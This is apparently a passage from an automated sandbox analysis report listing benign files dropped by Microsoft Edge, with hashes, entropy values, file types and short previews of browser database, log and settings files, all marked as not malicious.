                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.237813388693834
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJDQIu1wkn23oH+Tcwtfrl2KLl5bJDRlg9yq2Pwkn23oH+TcwtfrK+IFUv:7V5fYeb1LxBvYfYeb23FUv
                                                                                                                                                                                                                                                                                                                  MD5:0E5A79819B1CB97273AE19C8925D4729
                                                                                                                                                                                                                                                                                                                  SHA1:CB6BE1EF7EFE92C1A9CCDD86B382BF5450DE1A9E
                                                                                                                                                                                                                                                                                                                  SHA-256:71B90EDF950DB7E71FA9FA2D4494070D56A63A008B773618DF3A058541DE54A2
                                                                                                                                                                                                                                                                                                                  SHA-512:9EA503C3E9BE606D7724DF266B74630C612602EAF96E916D7076630047A5D877791FA7310FE70618B0830D7082D2801140FDFB6FAE170F429C267EF1C639717D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.632 14c0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/01/09-04:59:17.641 14c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):617
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9325179151892424
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUteza//z3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYUtezaD3RUovhC+lvBOL0
                                                                                                                                                                                                                                                                                                                  MD5:AD15D72AA4792C14DDD002CED70E8245
                                                                                                                                                                                                                                                                                                                  SHA1:30D0E75166FDA7126A73480EE3222C193231B579
                                                                                                                                                                                                                                                                                                                  SHA-256:17A781FB31D3176491D9B277ADEEE5521972C68956A2271637BBCBFEB27D6A7D
                                                                                                                                                                                                                                                                                                                  SHA-512:20B8D19B529A392FE0CBB44844926210D98C477498377B8370AA3A3A763C047EF96BE341686406522868EF848C83EF5EF4792B17CDD0462D4680EDA542C8A54F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):299
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1927383761390145
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJD91wkn23oH+Tcwtfrzs52KLl5bJD2pyq2Pwkn23oH+TcwtfrzAdIFUv:7OfYebs9LcMvYfYeb9FUv
                                                                                                                                                                                                                                                                                                                  MD5:2269DF0D15836EF8A6ACD0DE29D3B0D8
                                                                                                                                                                                                                                                                                                                  SHA1:5F09BD15C82B2867D315FFCA665B056813A72320
                                                                                                                                                                                                                                                                                                                  SHA-256:5562DEBB93E0FD45C83E7949C8961B772F24721A1A3F32A94175CAD822879D61
                                                                                                                                                                                                                                                                                                                  SHA-512:C434768D3314F42004A8723AE1487F7F84A4D586823393D11F451456D0E501B3B3DB0BAE4E28D4023A741D072659480DD2E489C45B4BA49BC21E7733310DFB2E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.297 14c0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/01/09-04:59:17.630 14c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlq1o:Ls3Oo
                                                                                                                                                                                                                                                                                                                  MD5:F5BBB6EE4C0764E8AA3B7F8FEE56EF4A
                                                                                                                                                                                                                                                                                                                  SHA1:098E4B7E6C080FDB8A10F1C7FAFE49FF67E7DEA9
                                                                                                                                                                                                                                                                                                                  SHA-256:7951EE4B45827E87335205F9BC8BCA4E555A2C02D3AE7517CD46314275E861BD
                                                                                                                                                                                                                                                                                                                  SHA-512:83EF85E5887141926707808783B89216ADB9C2EF6546234CFBD3BF010A5FB09AB09BE55B257D02891FCABE9B0BD94BA6BECAD4B471BDC147A9B0126B9A0440BE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................u..P./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlpl:Ls3n
                                                                                                                                                                                                                                                                                                                  MD5:4AF98A09D505A2D9C52ACDC13876C6BF
                                                                                                                                                                                                                                                                                                                  SHA1:B51C42DE2589C0752312F5D22AB0C8602F0DB692
                                                                                                                                                                                                                                                                                                                  SHA-256:E1CE6EE233681E348D5608A86D48E29EC408C84CD3F58CEC147C62650AB157CE
                                                                                                                                                                                                                                                                                                                  SHA-512:104C42D57E59E2C98D94E4C20D074CAD3145EFD819F0CE853B32B04C2C321614A756EFDA9CB01E08D3BE8926D7E835085C653C557AC655F849B02722A9063555
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:..........................................P./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
